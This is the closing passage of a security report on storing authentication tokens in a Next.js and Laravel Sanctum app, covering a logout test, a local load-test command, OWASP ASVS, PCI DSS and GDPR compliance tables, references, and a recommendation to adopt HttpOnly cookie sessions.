// 5. Verify session cleared
|
||
|
|
const unauthorizedResponse = await fetch('/api/user', {
|
||
|
|
credentials: 'include'
|
||
|
|
});
|
||
|
|
|
||
|
|
expect(unauthorizedResponse.status).toBe(401);
|
||
|
|
});
|
||
|
|
```
|
||
|
|
|
||
|
|
### Performance Testing
|
||
|
|
```bash
|
||
|
|
# Load test authentication endpoints
|
||
|
|
ab -n 1000 -c 10 -p login.json -T application/json http://localhost:3000/api/auth/login
|
||
|
|
|
||
|
|
# Monitor response times
|
||
|
|
# Target: < 200ms for authentication flows
|
||
|
|
# Target: < 100ms for API calls with session
|
||
|
|
```
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 9. Compliance & Standards
|
||
|
|
|
||
|
|
### OWASP ASVS 4.0 Compliance
|
||
|
|
|
||
|
|
| Requirement | Current | Solution 2 | Solution 4 |
|
||
|
|
|-------------|---------|-----------|-----------|
|
||
|
|
| V3.2.1: Session tokens HttpOnly | ❌ No | ✅ Yes | ✅ Yes |
|
||
|
|
| V3.2.2: Cookie Secure flag | ❌ No | ✅ Yes | ✅ Yes |
|
||
|
|
| V3.2.3: Cookie SameSite | 🟡 Lax | ✅ Lax/Strict | ✅ Strict |
|
||
|
|
| V3.3.1: CSRF protection | 🟡 Partial | ✅ Full | ✅ Full |
|
||
|
|
| V3.5.2: Session timeout | 🟡 7 days | ✅ Configurable | ✅ Configurable |
|
||
|
|
| V8.3.4: XSS protection | ❌ No | ✅ Yes | ✅ Yes |
|
||
|
|
|
||
|
|
### PCI DSS Compliance
|
||
|
|
- **Requirement 6.5.9 (XSS):** Solution 2 & 4 provide XSS protection
|
||
|
|
- **Requirement 8.2.3 (MFA):** Can be added to any solution
|
||
|
|
- **Requirement 8.2.4 (Password Security):** Laravel provides bcrypt hashing
|
||
|
|
|
||
|
|
### GDPR Compliance
|
||
|
|
- **Article 32 (Security):** Solution 2 & 4 meet security requirements
|
||
|
|
- **Data Minimization:** Session-based auth minimizes token exposure
|
||
|
|
- **Right to Erasure:** Easy to delete session data
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 10. References & Further Reading
|
||
|
|
|
||
|
|
### Official Documentation
|
||
|
|
- [Laravel Sanctum - SPA Authentication](https://laravel.com/docs/11.x/sanctum#spa-authentication)
|
||
|
|
- [Next.js Authentication Guide](https://nextjs.org/docs/app/guides/authentication)
|
||
|
|
- [Next.js 15 cookies() function](https://nextjs.org/docs/app/api-reference/functions/cookies)
|
||
|
|
- [OWASP SameSite Cookie Attribute](https://owasp.org/www-community/SameSite)
|
||
|
|
- [NIST 800-63B Session Management](https://pages.nist.gov/800-63-3/sp800-63b.html)
|
||
|
|
|
||
|
|
### Security Resources
|
||
|
|
- [OWASP Content Security Policy](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)
|
||
|
|
- [Auth0: Backend for Frontend Pattern](https://auth0.com/blog/the-backend-for-frontend-pattern-bff/)
|
||
|
|
- [PortSwigger: Bypassing SameSite Restrictions](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)
|
||
|
|
- [MDN: HttpOnly Cookie Attribute](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#restrict_access_to_cookies)
|
||
|
|
|
||
|
|
### Community Discussions
|
||
|
|
- [Is it safe to store JWT in localStorage?](https://stackoverflow.com/questions/44133536/is-it-safe-to-store-a-jwt-in-localstorage-with-reactjs)
|
||
|
|
- [Token storage security debate](https://dev.to/cotter/localstorage-vs-cookies-all-you-need-to-know-about-storing-jwt-tokens-securely-in-the-front-end-15id)
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## Conclusion
|
||
|
|
|
||
|
|
Your current implementation (localStorage + non-HttpOnly cookies) has a **Critical** risk score of **7.6/10** due to XSS vulnerabilities.
|
||
|
|
|
||
|
|
**Recommended Action:** Migrate to **Solution 2 (Sanctum Cookie-Based Sessions)** within the next sprint. This is Laravel Sanctum's officially recommended pattern for SPAs and provides the best security-to-complexity ratio.
|
||
|
|
|
||
|
|
**Quick Win:** If immediate migration isn't possible, implement **Solution 1 (HttpOnly Proxy)** as a temporary measure to eliminate localStorage vulnerabilities within 2-4 hours.
|
||
|
|
|
||
|
|
**Do Not:** Rely solely on **Solution 3 (Token Encryption)** as it provides a false sense of security and is still vulnerable to XSS attacks.
|
||
|
|
|
||
|
|
The research shows a clear industry consensus: **HttpOnly cookies with CSRF protection are the gold standard for SPA authentication security**, and Laravel Sanctum provides this pattern out of the box.
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
**Research Confidence:** 85%
|
||
|
|
**Sources Consulted:** 25+
|
||
|
|
**Last Updated:** 2025-11-07
|